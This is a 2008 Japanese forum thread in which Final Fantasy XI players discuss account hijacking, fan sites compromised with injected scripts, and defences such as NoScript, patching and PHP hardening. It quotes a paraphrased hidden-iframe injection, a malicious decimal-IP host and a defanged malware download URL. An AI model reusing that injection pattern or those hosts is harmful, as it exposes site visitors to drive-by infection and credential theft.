>>553みたいな自称玄人はもうお腹いっぱい

555 名前:既にその名前は使われています:2008/08/10(日) 20:29:27 ID:5KsfBGvi
でも自称素人もおなかいっぱいなんじゃ?・・・

556 名前:既にその名前は使われています:2008/08/10(日) 20:33:00 ID:6CcXvgQD
FF11・マップガイドがやばいのか
白地図本舗とかだとRMT業者広告がいやだとかいう人いるっていうんで
わざわざ手書き地図っぽいあそこを地図サイトとして人に紹介しちまったよ・・・

どこにやばいスクリプトあるか確認に行きたいがこえーなー
フラッシュプレイヤ最新版でFirefoxでNoScriptとIFRAME禁止にしてあれば見に行っても平気だろうか

557 名前:既にその名前は使われています:2008/08/10(日) 20:34:28 ID:YySDbD9n
>>556
今回のに限って言えば大丈夫だと思うよ
もちろんNoScriptは基本全ブロックにしておくこと

558 名前:既にその名前は使われています:2008/08/10(日) 21:23:41 ID:kQDk+RIP
>>553
セキュリティの玄人ならここには踏み入らないのでは?w
ハックされてから始めて来ましたってのは今までも来ていたけど「まさか自分が」とか「恥ずかしいから」とか
そんな状態から出る言葉
まぁ簡単に言えばパニックだなw

自称玄人さんはいざハックされるとみんなそうなるよ^^;
>>553
これを読んだ君は今年の夏の終わり頃に順番が回ってくる予定だよ

559 名前:既にその名前は使われています:2008/08/10(日) 21:31:59 ID:cAC722rd
マップガイドのトップページFF11.htmに見事にスクリプト埋め込まれてるな
メモ帳で見てもわかる

560 名前:既にその名前は使われています:2008/08/10(日) 21:45:30 ID:+ZC2QURq
昨日姫と生で本番したら感染した(T_T)

561 名前:既にその名前は使われています:2008/08/10(日) 21:50:39 ID:YySDbD9n
>>560
風俗スレ池

562 名前:既にその名前は使われています:2008/08/10(日) 21:52:10 ID:4AoqWpzf
みんなセキュリティーの玄人とかプロなんか言ってないのに一部の奴が相手をプロやら玄人といって馬鹿にしてるだけだろ?

上で何人もが言ってるが少しでもPCがおかしいと思ったら調べる癖がついてればウイルスが入ったとしてもキャラをハックされるまでに対処できたかもしれない訳だ
htmlソースを直接改竄されるような事態が出てる以上どれだけ気をつけても足りないわけだ

>>558
改竄されたHPの報告やらしてくれてる人もいるんだからそういう態度は頂けないぜ




563 名前:既にその名前は使われています:2008/08/10(日) 22:02:05 ID:WI8QwvVt
>>558
素人も玄人も無いさ。油断したら皆喰われる。


564 名前:既にその名前は使われています:2008/08/10(日) 22:04:36 ID:6CcXvgQD
NoScriptで確認した
右クリックリストで
h tt p:// 1039045744:88を許可 ってのが出るな、これか・・・

サイト管理者に連絡しようにも連絡先すら載ってない
ちゃんと管理者明記されてるサイトじゃないとダメだな
管理者不明のサイトを人に紹介するのはもう止めよう・・・

565 名前:既にその名前は使われています:2008/08/10(日) 22:14:51 ID:pYO9ixmb
FF11マップガイドに埋め込まれてたスクリプトって
どのオプションに分類されるのかわからないかな

今のところログイン中で落とされてはいないんだけど
NoScript入れてなかった状態で最近踏んだので不安・・・

566 名前:既にその名前は使われています:2008/08/10(日) 22:21:19 ID:YySDbD9n
>>565
flashのやつだと思うけど、名前は一緒だけど中身がしばしば変わってるらしいからなー
PG2も入れてない?

567 名前:既にその名前は使われています:2008/08/10(日) 22:30:03 ID:pYO9ixmb
>>566
以前騒ぎになったときにIFRAMEを無効にして
その後はwinupdateとかflashplayerうpとかぐらいしかやってなかったんだ・・・
くりんいんすこしたほうがいいか

568 名前:既にその名前は使われています:2008/08/10(日) 22:36:45 ID:YySDbD9n
>>567
WUとFlashPlayerの更新が済んでるなら感染の可能性はだいぶ下がるだろうけど、
大丈夫って断言できないからなー
どれだけスキャンして無事が確認できても何か気持ち悪さが残るんだよね。
クリンスコできる状況ならやっちまったほうがすっきりするかもなー
そして今後はFireFoxとNoScriptも導入するよろし

569 名前:既にその名前は使われています:2008/08/10(日) 22:37:32 ID:4AoqWpzf
>>567
踏んだ日付覚えてるか?あと、ブラウザはIE?OSは?
とりあえずウイルススキャンしてみたら?亜種だったら見つからないと思うが

何かしら症状が出ればクリーンインスコっていうが、今の状態では気になるならした方が良いだろうな。
後々の事とビクビクしながらFFしたくないなら

570 名前:既にその名前は使われています:2008/08/10(日) 22:40:33 ID:+uPpoUAR
このアカハックのご時世に
こんな馬鹿なやつらもいるんで是非ご覧ください↓

【基地外警報wFF11初の裁判決行になるか!?】
FF11にてwアカウント共有をしていた『規約違反者w』同士が
アイテムを盗る盗られたで片方が さいばんw を起こす模様ですwww

http://changi.2ch.net/test/read.cgi/ogame/1218192684/

みんな見に来てね!


571 名前:既にその名前は使われています:2008/08/10(日) 22:43:15 ID:pYO9ixmb
>>569
踏んだのは月曜
OSはXPpro IE6

とりあえずスキャンしてみるよ・・・

572 名前:既にその名前は使われています:2008/08/10(日) 22:44:33 ID:PYIKDmKO
今後、不正アクセスに関しては、インフォメーションセンターへのお電話ではなく、「不正アクセス専用チャットサポート」にてお問い合わせください
https://secure.playonline.com/support/index.html

573 名前:既にその名前は使われています:2008/08/10(日) 22:47:53 ID:4AoqWpzf
あそこの報告があったのは8/8の深夜だった記憶が、ちょっと定かではないが

悪いことはいわん、ブラウザにIE使うのだけはやめておけ
何もでないことを祈るわ

574 名前:既にその名前は使われています:2008/08/10(日) 23:07:14 ID:iQYW/NEJ
こんな奴等がいる限り垢ハックはなくならない
http://search.auctions.yahoo.co.jp/search/auc?p=FF11&auccat=0

575 名前:既にその名前は使われています:2008/08/10(日) 23:09:02 ID:h1LOJgk1
>>574
スクエニが休みの土日狙って出品とか業者だな
盗んだアイテム売ってんだろ

576 名前:既にその名前は使われています:2008/08/10(日) 23:16:43 ID:DUlDt+Ln
8月のMS月例パッチは12件、IEやOfficeの深刻な脆弱性に対処

 米Microsoftは8月12日(日本時間13日)、月例アップデートで「緊急」レベル7件
「重要」レベル5件のセキュリティ更新プログラムを公開する。7日の事前告知で発表した。

ソースはITmedia

577 名前:既にその名前は使われています:2008/08/10(日) 23:18:34 ID:Rt73tiEp
http://pc11.2ch.net/test/read.cgi/isp/1217057555/l50

こんなのもあるらしい。怪しいサイトに行かないだけじゃどうしようもないなww

578 名前:既にその名前は使われています:2008/08/10(日) 23:19:28 ID:WI8QwvVt
Firefoxもセキュリティ考えてなさそーなアドオンが見え隠れして
薦めてるヤツは結構ドキドキな感じがしないか?w

579 名前:既にその名前は使われています:2008/08/10(日) 23:24:43 ID:YySDbD9n
>>578
こっちが素人用だが
https://addons.mozilla.org/ja/firefox/addon/4298
これとか素人には扱えなくて超危険だぜ!
http://www.mozilla.gr.jp/~makoto/shiitake/
(わかる人だけ踏んでください)

580 名前:既にその名前は使われています:2008/08/10(日) 23:27:30 ID:WI8QwvVt
>>579
見て判ったが、癒されたわw

581 名前:既にその名前は使われています:2008/08/11(月) 00:04:43 ID:BdV5u1vn
Firefox使ってます。
xreaとfc2が怖いからProCon Latteという
フィルタのアドオン入れてみました。
フィルタするURLにxrea.comや
fc2.comを設定しておけば表示されなくなりました。
(このドメインのは見れなくてもいいやww)

Firefox3でも使えました。
参考までにどうぞ

582 名前:既にその名前は使われています:2008/08/11(月) 00:06:06 ID:IAR/KhZb
公式の接続先変わった?

583 名前:既にその名前は使われています:2008/08/11(月) 00:06:47 ID:BdV5u1vn
書き忘れましたw
ダウンロードは ttps://addons.mozilla.org/en-US/firefox/addon/1803 です

584 名前:既にその名前は使われています:2008/08/11(月) 00:09:50 ID:7BJ3ob0m
>>581
XREAはバリュードメインと組み合わせての
独自ドメイン運用も多いんだよなぁ。

585 名前:既にその名前は使われています:2008/08/11(月) 00:17:30 ID:BdV5u1vn
>>584
xreaがつくURLだけでもよかですわw

586 名前:既にその名前は使われています:2008/08/11(月) 00:42:55 ID:VKINbCQW
使ったばっかなんで間違ったらアレだが、
netbenriは弾けないぞ?
今回の騒動の元になったxreaのサイトな。

587 名前:既にその名前は使われています:2008/08/11(月) 00:48:36 ID:BdV5u1vn
>>586
Main FilterのEditlistのBlocked Sitesに
netbenri●comって入れたんじゃ弾けない?
(●はドットね)

588 名前:既にその名前は使われています:2008/08/11(月) 00:52:41 ID:VKINbCQW
>>587
回答がずれてる事に気付いてくれ。

589 名前:既にその名前は使われています:2008/08/11(月) 01:02:19 ID:BdV5u1vn
単純にURLでのフィルタだけで
実際のホストまでを見ては弾けないです。
すんませんでした・・・orz

590 名前:既にその名前は使われています:2008/08/11(月) 01:08:00 ID:IAR/KhZb
FF11・マップガイド  〜 orz< びっくりするほど よい旅を! 〜

591 名前:既にその名前は使われています:2008/08/11(月) 01:18:50 ID:VKINbCQW
>>590
今は単独サイトを弾くワードじゃなくて
ドメインを丸ごと弾ける手段の話題だと思ってる。
単独ならそれでもいいんだ・・・それでもな。

592 名前:既にその名前は使われています:2008/08/11(月) 01:23:14 ID:IAR/KhZb
わたくしはドメイン云々の会話には参加してないと思われ

593 名前:既にその名前は使われています:2008/08/11(月) 01:39:05 ID:VKINbCQW
>>592
なるほど、582が581に対する問いで無かったのなら申し訳ない。

594 名前:既にその名前は使われています:2008/08/11(月) 02:09:29 ID:4K3aYIsW
自分の垢売って、その後■eに垢ハックされたって報告した奴とかいる?

595 名前:既にその名前は使われています:2008/08/11(月) 02:13:40 ID:jnLumUjL
>>594
ここは詐欺のやり方教えるところじゃありませんよ

596 名前:既にその名前は使われています:2008/08/11(月) 02:14:14 ID:rdDKceCE
巻き戻す場合、警察に届け出すの必要らしいじゃん。
通用しないんじゃね。

597 名前:既にその名前は使われています:2008/08/11(月) 02:17:52 ID:7BJ3ob0m
先日のXREAの件、セキュmemoに載ったのね。
これでXREAも何らかのアナウンス出すことになるんじゃないかな。

598 名前:既にその名前は使われています:2008/08/11(月) 02:30:38 ID:V5vaNjM5
>>594
巻き戻すには身分証明が必要
つまりすぐ足が付く。
スクエニの規約<<<<<<<<<<<<<<<刑法246条

599 名前:既にその名前は使われています:2008/08/11(月) 02:34:19 ID:LBaDTpFY
>>590のサイトを何日か前開いてしまったんだがaviraがピコピコッと反応して
access deny(接続拒否、だよな?)でokしといたけどこれで対応良かったんだろうか?
それ選んだ後に普通にそのサイト見れたからちゃんと問題のものに接続拒否出来てたのかどうか。
FFやってるPCじゃないから感染しても被害は無いけど、Quarantine(検疫)にしとくべきだったんだろうか。
引っかかったのはHEUR/HTML.Malwareってのだった。

取り合えず>>13のを試してみてwzcsvbxm.dllはなかったが。

600 名前:既にその名前は使われています:2008/08/11(月) 02:39:50 ID:ALdhVNDH
>>594
前に一人いたよ。
が、たとえゲーム内で規約違反でも、現実の取引で詐欺をはたらいたことになるから
垢買い側に訴えられたら間違いなく負ける。
契約不履行の民事だか詐欺罪での刑事だかはわからない。眠いから調べる気力がない。
ま、要するにゲームで一時的に勝ってもリアルで負ける。

601 名前:既にその名前は使われています:2008/08/11(月) 02:58:47 ID:cthKcj+T
せきゅmemoすげーな
分かり易い

602 名前:既にその名前は使われています:2008/08/11(月) 03:00:14 ID:7BJ3ob0m
>>599
今回XREAに仕掛けられていたのを踏んで投下されるのは
「wzcsvbxm.dll」じゃなくて信長の野望Onlineで話題になっていた(らしい)
「KernaeghDrv.dll」ね。
英Sophosの検出名「Troj/Lineag-DV」の
ttp://www.sophos.com/security/analyses/viruses-and-spyware/trojlineagdv.html
の「More Information」参照。

603 名前:既にその名前は使われています:2008/08/11(月) 05:04:17 ID:/L29dZn7
なんかFirefoxの対策についてしか出てないんだが、
Operaの場合はnoscriptの代替としては
ツール>設定>詳細設定>コンテンツをたどって
・JavaScriptを有効にする
・Javaを有効にする
のチェックをはずしてiFrameを無効にしておけばいい?
プラグインを有効にするのチェックもはずしたほうがいいのかな?

もちろん今後のことはわからないから、今までの範囲の話だけど

604 名前:既にその名前は使われています:2008/08/11(月) 05:31:51 ID:QVO+kBur
なんかメールでこんなのが来たんだけど;

www★jabotana★mynetcologne★de/explorer-7★0★exe

.→★でつ

605 名前:既にその名前は使われています:2008/08/11(月) 05:45:32 ID:LPVCczNQ
おいおい、いきなり他のPCから起動したうんぬんのメッセージ出て、追い出されたぞ。
で、ログインしようとしてもパスが違いますって入れない。

これが垢ハックかよorz
サポート対象外時間で\(^o^)/オワタ

606 名前:既にその名前は使われています:2008/08/11(月) 05:56:33 ID:LPVCczNQ
うは、しかも今日臨時休業ってふざけんなよ・・・・。

607 名前:既にその名前は使われています:2008/08/11(月) 06:44:40 ID:LPVCczNQ
俺もさっき被害にあったっぽいんだが、まじで1〜2ヶ月まき戻るのかorz
もの凄い被害になりそうなんだが。

608 名前:既にその名前は使われています:2008/08/11(月) 06:45:12 ID:LPVCczNQ
ミスw
垢ハックスレのほうに書いたつもりでした。

609 名前:既にその名前は使われています:2008/08/11(月) 06:57:21 ID:LBaDTpFY
>>602
なるほど、違う奴だからwzcsvbxm.dllの方を調べても意味無かったか。
何スレか前(田代砲云々とかwzcsvbxm.dllの話題が頻繁だった頃)辺りは読んでたんだが
ここ最近は忙しくて見てなかった。また別のが話題になってた訳だなー。

610 名前:既にその名前は使われています:2008/08/11(月) 07:03:14 ID:JldOSKyz
www.netbenri.com、アクセスできなくなってる?
あと黒魔メモ、件のリンクが消えてた。

611 名前:既にその名前は使われています:2008/08/11(月) 07:31:09 ID:LPVCczNQ
GM44件待ち・・・
何時間かかんだよ(;´Д`)

612 名前:既にその名前は使われています:2008/08/11(月) 07:43:55 ID:uwrZkdCV
>>611
一昨日6番目だったが7時間後にGMきた

613 名前:既にその名前は使われています:2008/08/11(月) 07:53:18 ID:S8epNX2T
ハッキングでデータ戻すことになったとき、■eは当然ハッキング後のアクセス元IPとかを
警察やプロバイダに届けてるんだよね?
あと、被害あった人は、その犯人の接続元とか教えてもらえるの?

614 名前:既にその名前は使われています:2008/08/11(月) 07:57:02 ID:LPVCczNQ
>>612
ちょ・・・・・・orz

615 名前:既にその名前は使われています:2008/08/11(月) 08:23:43 ID:1zwFHUrV
警察に届けるときは最寄りの交番でいいですか?
あと、なにの侵害っていうんでしたっけ…

616 名前:既にその名前は使われています:2008/08/11(月) 08:52:22 ID:jjoX2Mag
>>615
>>9


617 名前:既にその名前は使われています:2008/08/11(月) 08:59:14 ID:vi2TYYkW
>>613
スクエニのサーバーがハッキング受けたわけじゃないから、
スクエニは不正アクセスの直接の被害者じゃない。

618 名前:既にその名前は使われています:2008/08/11(月) 09:09:57 ID:iObT9MdG
>>506
XREA 1039045744:88 の確認されたサイト

吟遊詩人テンプレ:メニュー ヘッダー
 8月2日23時45分頃〜8月7日21時40分頃
忍者スレテンプレ:メニュー </body>と</html>の間
 ?月?日?時?分頃〜8月10日2時15分頃
黒魔協会:xml宣言の前
 8月7日22時23分頃〜8月11日1時56分頃
FF11・マップガイド(ネット便利)フッターテーブル内
 ?月?日?時?分頃〜8月11日?時?分頃

忍者テンプレとマップガイドは、いつから改竄されていたのか情報無し。
情報として改竄されていた報告はトップに載せておいて欲しいなぁ。

619 名前:既にその名前は使われています:2008/08/11(月) 10:11:00 ID:+keKJFaA
>>603
no more scriptってのがあるぞ。
firefoxのno scriptとほぼ同機能。

620 名前:既にその名前は使われています:2008/08/11(月) 10:34:49 ID:1zwFHUrV
>>619
ありがとうございます。
いまアカウントを凍結している状態ですが、データ復元を明日依頼する予定です。その際に被害届を出したと伝えると、スクエニが早く(一週間くらい)対応してくれるでしょうか?

621 名前:既にその名前は使われています:2008/08/11(月) 10:35:50 ID:1zwFHUrV
>>619ではなく>>616でした、すいません。

622 名前:既にその名前は使われています:2008/08/11(月) 10:51:49 ID:SywjnnVm
>>620
素早い対応を求めるのは無理かと・・・
ttp://changi.2ch.net/test/read.cgi/ogame/1216987350/

623 名前:既にその名前は使われています:2008/08/11(月) 10:55:53 ID:RU97v4Vh
いやー、俺もやられましたwww
これやられると、モチが一気に無くなるねーー。

624 名前:既にその名前は使われています:2008/08/11(月) 11:14:11 ID:6vyqpTRl
7月にクレカで被害あって会社に電話してないけど8月1日に処理されるはずが
WEBの9月明細にはいってないぞ???(POL7月利用分なし)
興味あるから放置してるけど、本当に請求してくるかどうか・・・

クレカは即日決済って言ってるけど、処理してるのは毎月1日の午前0時〜4時ぐらいだろ?
現に6月のPOL利用分は7月1日決済で8月に請求されてるからな

つまり、現時点では7月の被害を8月1日に処理しなかった(1ヶ月間あるからスクエニが対応処理できるから)
スクエニが良心的に対応してくれていると考えていますが・・・違いますか?!


625 名前:既にその名前は使われています:2008/08/11(月) 11:24:46 ID:zXtTBRlk
1039045744:88のやつ ぴょん基地の友達で見てみたんだけど
クッキー書き換えしてない?
クッキーにJって文字列があったら 有効期限延ばして
document.write("<iframe src=http:\/\/やばいやつ:88 width=100 height=0><\/iframe>"
って書き換えるように読めるんだけど。
JS詳しくないんで勘違いならいいんだが...

626 名前:既にその名前は使われています:2008/08/11(月) 11:27:26 ID:9NDGF/io
>>624
昔どっかのえらい人が
理解なんてものは概ね願望に基づくものだ 現実は甘くない。

って言ってた。まあ座して待てよ。
ハクられて必死になるのはわかるが
引かれるか引かれないかはいずれわかる事だ。

627 名前:既にその名前は使われています:2008/08/11(月) 11:36:40 ID:BWkHYkWl
マジで電話つながらないな・・・
ガイダンスに従って入力しないとオペレーターと会話できないから話中でも50秒はかかるな。
しかもフリーダイヤルじゃねーし。50秒=30円 これを5分毎にリダイヤルして3時間後に繋がると約1000円かよ\(^o^)/

628 名前:既にその名前は使われています:2008/08/11(月) 11:51:41 ID:tFGPA71I
>>627
本当にボロイ商売だよなw
何もしなくても金が振ってくるんだぜwwwww
とか思ってるんだろうな■は

629 名前:既にその名前は使われています:2008/08/11(月) 11:53:24 ID:9+2CYNSn
どうせもはや1日位変わらないんだから素直に明日まで待ってチャットすればいいのに(^^;

630 名前:既にその名前は使われています:2008/08/11(月) 11:54:29 ID:IFFay0H8
最近ハックされた方も”事前症状”は以前と同じですか?
ウィンドウズアップデートが出来ない、終了オプションが異常に遅い
・・・等が、ありましたか?


631 名前:既にその名前は使われています:2008/08/11(月) 11:55:06 ID:uwrZkdCV
>>627
ヒント
ガイダンス<電話機の機能確認のため「0」を押してください。→押す
ガイダンス<ご希望の担当窓口の番号を押してください(FFは「1」。→押さないで待機してみる

632 名前:既にその名前は使われています:2008/08/11(月) 11:59:26 ID:CmSW/exM
>>631
ありがとうwww
あせって速攻で1押してた俺若干涙目wwww

633 名前:既にその名前は使われています:2008/08/11(月) 12:24:00 ID:7BJ3ob0m
>>604
それは偽IE7メールじゃないかな。
偽CNNメールと並んで世界中でうじゃうじゃ出回ってるspam。
こんなメール。うちにもいっぱい来てる。
偽IE7 ttp://pandasecurityus.wordpress.com/2008/08/06/fake-microsoft-internet-explorer-70-update/
偽CNN ttp://pandasecurityus.wordpress.com/2008/08/08/cnn-alerts-new-malcode-antivirus-xp-2008/
いずれもアカハックとは関係無し。

634 名前:既にその名前は使われています:2008/08/11(月) 12:41:35 ID:0TWmzxxD
再度電話したら1(ry2(ryの後に「なお電話での不正アクセスに関するお問い合わせは受けておりません。ウェブからお申し込みください」が追加されてたwwww
しかも急いで録音したらしくかなりやっつけな音声wwwwwwwwww

635 名前:既にその名前は使われています:2008/08/11(月) 12:41:50 ID:7BJ3ob0m
XREAサポートフォーラムより
ttp://sb.xrea.com/showthread.php?t=12960
外部ユーザー様から通報いただいた1サイトのみの確認ですが、
ログから判断しますと、
スクリプト経由で書き換えられている可能性が高いと思われます。
スクリプト自体を最新にする
.htaccess に
php_flag allow_url_fopen off
php_flag allow_url_include off
php_flag register_globals off
を記述する
万全ではありませんが、下記の方法でアクセス制限をする
ttp://sb.xrea.com/showpost.php?p=77290&postcount=3
といった対策があります。
他に数サイトあるようですが、他のサイトはまだ把握しておりません。
また、最新ではないXOOPS運用サイトでもなどでも
同様の改ざんがされることを確認できております。
なお、上記PHP設定項目が旧サーバーでOnになっているサーバーは、
アップデート時にサーバー側でOffに変更させていただいております。
ttp://sb.xrea.com/showthread.php?p=83962#post83962

636 名前:既にその名前は使われています:2008/08/11(月) 13:24:12 ID:pYIFKQ3H
マップガイド今見たら改ざんされてたって報告があって始めて気づいた
期間中に思いっきり見まくってた・・・
誰かネ実にスレ立ててくれよー
マップガイドがやられてたのはwzcsvbxm.dll?
FireFox+NoscriptでPg2導入(テンプレサイトの6月までのIP弾き)
ただWindowsとフラッシュプレーヤーは最新じゃない・・(6月までの更新は○)

637 名前:既にその名前は使われています:2008/08/11(月) 13:28:20 ID:JldOSKyz
>636
なんでWinとFlashは最新じゃねえんだよ。
まずそこを何とかしろよ。

638 名前:既にその名前は使われています:2008/08/11(月) 13:35:07 ID:g33kro/e
もしかして垢ハック受けた奴は明日までスクエニに通報できないの?


639 名前:既にその名前は使われています:2008/08/11(月) 13:46:14 ID:pYIFKQ3H
>>637
はっきり言ってFireFoxのセットとPG2+COMODO、パスは保存せず毎回手動で安心しきってた
FC2は見ないようにしてたしdll改ざんは毎日落ちる度に確認してたから

とりあえず箱あけで見まくってた昨日のPG2の許可とブロックのログに>>361の奴は無かった
けどやっぱ際インスコか・・・

640 名前:既にその名前は使われています:2008/08/11(月) 13:51:57 ID:J7en+GnH
何となく張ってみた。
http://www.matousec.com/projects/firewall-challenge/results.php

641 名前:既にその名前は使われています:2008/08/11(月) 13:58:13 ID:7BJ3ob0m
>>639
プライオリティが逆。
OSやアプリを最新に保つ。これが先。
アンチウイルスやFWはその次。

642 名前:既にその名前は使われています:2008/08/11(月) 14:03:24 ID:73CUxqIy
>はっきり言ってFireFoxのセットとPG2+COMODO、パスは保存せず毎回手動で安心しきってた
これ見て不安なったんだが、cfpの仕様ちゃんと理解して設定とかルール作ってるか・・・?
理解できてないならcfpはお勧めしないよ。自分のレベルにあったものを使ったほうが安全だって。
被害にあう前に。

643 名前:既にその名前は使われています:2008/08/11(月) 15:01:39 ID:CA3068y+
>>636
一番肝心な所がスカスカでワロスwwww
君、センスないね・・・(´・ω・`)

644 名前:既にその名前は使われています:2008/08/11(月) 15:24:01 ID:/L29dZn7
>>619
サンクス
Firefoxの、必要なアドオンは自分で入れてくださいっていうのがいやで
Opera使ってたんだがこれで少し安心できるわ

それとこのスレはちょっとしたセキュリティの勉強にもなるなw

645 名前:既にその名前は使われています:2008/08/11(月) 16:17:33 ID:3ywAXBix
>>644
垢ハク犯に新たな手口や対策のヒントを与えているスレとも言えるがなw

646 名前:既にその名前は使われています:2008/08/11(月) 16:17:53 ID:+keKJFaA
まぁ、確かにそうだなw

647 名前:既にその名前は使われています:2008/08/11(月) 16:20:17 ID:y6DafzTu
パス送信先を米国鯖にされたことがあるからなぁ

648 名前:既にその名前は使われています:2008/08/11(月) 16:56:21 ID:zXtTBRlk
FF11・マップガイド(ネット便利)は さくらに移転
ドメイン移管で見られなかったみたいね。
どっちにしてもサイト管理者は 捨てアドでいいから連絡先書いといてほしいものだ。
お盆明けに 一気に感染サイトや感染報告増えそうな悪寒。


649 名前:既にその名前は使われています:2008/08/11(月) 17:38:40 ID:3/rEOqYK
スクエニはさっさと被害届けだせ
何か弱みでもあるのか?

650 名前:既にその名前は使われています:2008/08/11(月) 17:47:11 ID:nElbZURA
ゲーム鯖ハックされた訳じゃないから動かん。

651 名前:既にその名前は使われています:2008/08/11(月) 17:51:58 ID:y6DafzTu
>>649
弱みではなくうまみ
一日に何件くらいやられてるかわからないけど、鯖移動代がコンスタントに入ってくる。
まあただの陰謀論だけどさ。

>>617とか>>650みたいな建前を用意してるみたいだけど、リネでもROでも「他人のIDパスを
使って不正にアクセスした」人間の逮捕事例がしっかりある。鯖に対するハッキングでなくともね。

652 名前:既にその名前は使われています:2008/08/11(月) 17:54:14 ID:gMrQYDAM
カスペ完全スキャン後、週一のパス変更して新しいパスでログインしようとしたら
IDパスが違いますでログインできなくなったwハックされたか、新しいパスを打ち間違えて
登録しちまったかどっちかわからない状態。明日不正チャットで聞くしかないかw

653 名前:既にその名前は使われています:2008/08/11(月) 17:55:39 ID:UG+QOaol
>>652
パス入力間違いだったら何分か経ったらログインできるように
ならなかったっけ?

654 名前:既にその名前は使われています:2008/08/11(月) 17:57:05 ID:y6DafzTu
>>652
パスの再発行なら電話でもできると思うけど、今はどうなってるだろうな
そこらへんは全部チャットサポート行きになってるのかなぁ。
昔パス保存してあったPS2が壊れてパスわからなくなったときに
サポセンに電話して再発行してもらったことがある。

655 名前:既にその名前は使われています:2008/08/11(月) 18:18:24 ID:xuanXKFQ
>>652
フレにキャラ動いてないかみてもらえば?

656 名前:既にその名前は使われています:2008/08/11(月) 18:27:32 ID:QgY5xpJr
>>652
3日前リアフレから十数件テルが入ってて同じようなこと言ってた

実際はCapsLockかかっていただけだったんだがw
そうゆうこともあるから落ち着くのおすすめしていろいろ確認してみれ

657 名前:既にその名前は使われています:2008/08/11(月) 19:12:13 ID:Tq2qWubo
>>651
それは、そのアクセスされた人が訴えたんだろう。

658 名前:既にその名前は使われています:2008/08/11(月) 19:12:21 ID:GKd+pLWm
ageマース

659 名前:既にその名前は使われています:2008/08/11(月) 19:31:05 ID:y6DafzTu
>>657
垢ハック被害者の申請で運営側が訴えたんだよ

660 名前:既にその名前は使われています:2008/08/11(月) 19:49:56 ID:9kaBAPAV
>>649
理由はどうあれ話題的には暗いからあまり表には出したくないのではないかな?


661 名前:既にその名前は使われています:2008/08/11(月) 20:01:34 ID:d767xzND
■アカウントハックされた奴は最寄の警察に行って被害届けを出そう!
不正アクセスに増加に伴い親身になって対応してくれるようになったぞ!


※最近業者が行っても無駄だの馬鹿にされるだの
  逮捕されないために必死になってるので注意!


警察の窓口に行き「不正アクセスの被害を受けました」と伝えれば話がスムーズに進みます。


662 名前:既にその名前は使われています:2008/08/11(月) 20:05:01 ID:FB4xiLyY
いま、インしようとしたらプレイオンラインIDがちがいますっていわれたんだが・・・これってハックされたってこと?


663 名前:既にその名前は使われています:2008/08/11(月) 20:07:52 ID:yMy2uXOn
>>662
10回試してもダメで大文字小文字間違ってないのにインできないのなら90%ハックされてる
公式のLSコミュにもインできなけらば100%ハックされてる

664 名前:既にその名前は使われています:2008/08/11(月) 20:08:01 ID:y6DafzTu
>>662
プレイしているハードは?
パスは保存?それとも毎回入力?

「PC」でプレイしてて「保存してた」のにログインできなくなったのならほぼアウト
他なら入力間違いの可能性も無いわけではない

665 名前:既にその名前は使われています:2008/08/11(月) 20:08:40 ID:zHrKq+OX
いあ、IDが違うっていうのは基本的にありえないでしょ、パスワードならともかく

666 名前:既にその名前は使われています:2008/08/11(月) 20:09:52 ID:30Crq30Y
IDが違うってことは
毎回ゲストログインつかってるツワモノなんだろうな


667 名前:既にその名前は使われています:2008/08/11(月) 20:09:59 ID:Pw1j2lk4
きっとID欄にパスワード入れたんだよ

668 名前:既にその名前は使われています:2008/08/11(月) 20:10:07 ID:y6DafzTu
>>665
正確には「プレイオンラインID・またはパスワードが違います」だったはず
慌ててそこまで書かなかっただけかもね

669 名前:既にその名前は使われています:2008/08/11(月) 20:10:26 ID:yMy2uXOn
POLに繋がなくても公式で確認できる

ここの右上の「プレイオンライン会員情報」にアクセスできなければハックされてるよ
http://www.playonline.com/ff11/index.shtml

670 名前:既にその名前は使われています:2008/08/11(月) 20:11:01 ID:FB4xiLyY
いつもはPS3で保存でやってたんだけど、会社のPCで、今日の昼間パス入力して遊んだんだ・・・それでかなぁ・・・どうしよう(´;ω;`)

671 名前:既にその名前は使われています:2008/08/11(月) 20:11:38 ID:zHrKq+OX
>>662
プレイオンラインIDはユーザーで変更できる情報じゃないから
パスワードの間違い?

672 名前:671:2008/08/11(月) 20:13:08 ID:zHrKq+OX
パスワードっぽいな

673 名前:既にその名前は使われています:2008/08/11(月) 20:13:37 ID:9OG553lY
何が入ってるかわからん会社のPCなんかで遊ぶな

674 名前:既にその名前は使われています:2008/08/11(月) 20:14:12 ID:7BJ3ob0m
>>670
会社のPCでトロイ飼ってるのはマズいだろ。管理者に相談。

675 名前:既にその名前は使われています:2008/08/11(月) 20:15:10 ID:L0VWBc40
PG2で0.0.0.0-255.255.255.255をブロックして
>>10だけ許可リストに入れてFFしようと思うんだけど
PG2が61.113.95.11とか
204.203.18.138をはじくんだ

これ許可するとつながるんだけど
許可しないといけないもの?
POLのバージョンチェックでひっかかる。
なんでだろ


676 名前:既にその名前は使われています:2008/08/11(月) 20:15:30 ID:Pw1j2lk4
大した垢ハック対策もしてない、職場のネットに繋がるFF系ブログとかIEで見まくりの
遊び用PCにパスワード入力とか、かなりの強者ですね

677 名前:既にその名前は使われています:2008/08/11(月) 20:17:33 ID:1h2xZmKF
ここ見てカスペのフルスキャンを初体験したんだ

トレンドマイクロ、アンチウ゛ァイラスとかいうのが感染してました。

試用期間終わるから課金しようか迷ってたけど、
危ないところだった?

678 名前:既にその名前は使われています:2008/08/11(月) 20:24:04 ID:y6DafzTu
>>677
トレンドマイクロってのはウイルスバスターの製造元

アンチヴァイラスってのはAntiVirusのこと?それならウイルスバスター系統のソフトだと思うけど。
バスター使用中に見つけたウイルスを隔離しているファイルをカスペが見つけて
ウイルス扱いしてるんじゃない?
感染ファイル名を書けるならここに書いてみ。

679 名前:既にその名前は使われています:2008/08/11(月) 20:26:10 ID:6PIWGOeu
キャラが消されていたり鯖移動されていたりしても、、、、落ち込まないようにね。
まぁアイテムすべてなくなっているのは確実だろうけど、、
たしか単純に巻き戻すのではなく第三者に売却されたアイテム(オークションやバザーで売却されたアイテムギルはアウト)以外
を戻すんだっけ?


680 名前:既にその名前は使われています:2008/08/11(月) 20:27:43 ID:yfAHc5lt
>>670
これまでに同じように会社のPCでプレイしたことはある?

681 名前:既にその名前は使われています:2008/08/11(月) 20:30:30 ID:T3BS51/j
>>679
ん?すごく単純に巻き戻すよ?

682 名前:既にその名前は使われています:2008/08/11(月) 20:31:20 ID:yMy2uXOn
>>679
戻ってこないのは競売に出品中のアイテムと宅配中のアイテム。
盗られたアイテムは業者が全て売却し別垢に送りRMTサイトやヤフオクで売って儲けてる。

